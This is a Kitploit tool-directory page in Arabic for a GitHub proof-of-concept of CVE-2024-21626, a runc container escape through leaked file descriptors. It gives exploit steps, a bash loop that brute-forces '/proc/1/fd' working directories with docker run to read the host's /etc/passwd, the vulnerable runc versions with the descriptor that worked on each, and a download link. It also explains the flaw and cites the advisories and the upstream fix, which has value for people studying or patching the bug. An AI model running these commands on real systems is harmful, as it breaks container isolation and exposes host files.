Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21626 — CVE-2024-21626-poc-بحث-إعادة-الظهور-والمهام | Kitploit
أدوات/GitHubGitHub/cdxiaodong/cve-2024-21626
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن السحابةالهروب من الحاوية
GitHubcdxiaodong/cve-2024-21626

CVE-2024-21626

CVE-2024-21626-poc-بحث-إعادة-الظهور-والمهام

عرض المستودع
51منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الاستغلال:

  1. git clone https://github.com/cdxiaodong/CVE-2024-21626

  2. docker-compose up

التحقق: إذا تم الحصول على /etc/passwd من المضيف، فإن الثغرة موجودة.

البيئة: runc: >=v1.0.0-rc93, <=1.1.11

تفاصيل الهجوم والمبدأ: في الإصدارات المتأثرة من runc، بسبب تسريب بعض واصفات الملفات الداخلية أثناء التهيئة، بما في ذلك مقبض /sys/fs/cgroup الخاص بالمضيف، ولم يتحقق runc مما إذا كان دليل العمل النهائي يقع داخل مساحة الاسم الخاصة بالحاوية. يمكن للمهاجم تعديل تكوين process.cwd إلى /proc/self/fd/7 أو استبدال المسار المحدد الذي تم تمريره في معلمة --cwd عند استدعاء runc exec من المضيف برابط رمزي /proc/self/fd/7/، مما يسمح للعمليات داخل الحاوية بالوصول إلى نظام ملفات المضيف والتعامل معه، وبالتالي تجاوز آلية العزل الخاصة بالحاوية. مزيد من التفاصيل (صور gif):

  1. المهاجم يستخدم حزمة docker-poc المعدة ذاتيًا لاستغلال الثغرة CVE-2024-21626 runc process.cwd واختراق الحاوية عبر واصفات الملفات المسربة | Snyk (snyk.io)
  2. صورة docker هذه ليست مفتوحة المصدر بعد على الإنترنت العام 20240201 img_v3_027l_c9651fc0-e6db-4524-9363-1e12fca4f8dg
  3. منطق تعديل المصدر الرسمي: Merge pull request from GHSA-xr7r-f8xq-vfvv · opencontainers/runc@0212048 (github.com)
  4. Runc معرض لخطر اختراق الحاوية عبر حيلة Process.CWD وواصفات الملفات المسربة · CVE-2024-21626 · قاعدة بيانات استشارات GitHub

CVE: CVE - CVE-2024-21626 (mitre.org) مكتشف الثغرة: CVE-2024-21626 runc process.cwd واختراق الحاوية عبر واصفات الملفات المسربة | Snyk (snyk.io) image

قد يتغير واصف الملف الفعلي (fd) وفقًا لترتيب فتح الملفات. يمكن استخدام السكربت التالي للتفجير (brute force).

/// #!/bin/bash

for i in {3..10} do # 使用变量构造工作目录,并运行容器 docker run -w /proc/1/fd/$i ubuntu cat ../../../../../etc/passwd done ///

الاختبار المحلي ناجح: تم تحقيقه عبر fd/9 مع runc-version: 1.1.10 و1.1.2 image

عندما يكون runc --version 1.0.0: image

عندما يكون runc --version 1.1.4: تم تحقيقه عبر fd/8 image

ثغرة تم الكشف عنها اليوم فيما يلي تفاصيل إضافية

يمكن إعادة إنتاجها بالطرق التالية:

  1. runc - إدخال نقاط توقف يدوية والتجميع
  2. مراقبة runc باستخدام eBPF ونقاط التوقف
  3. runc create demo runc exec demo ls /proc/1/fd -a يمكن مشاهدة الروابط الرمزية المقابلة مباشرة
  4. docker run -w /proc/1/fd/0-10 ubuntu cat ../../../../../etc/passwd للتفجير

مهام مستقبلية: runc 断点获取df好实现自动化

تنزيل الأداة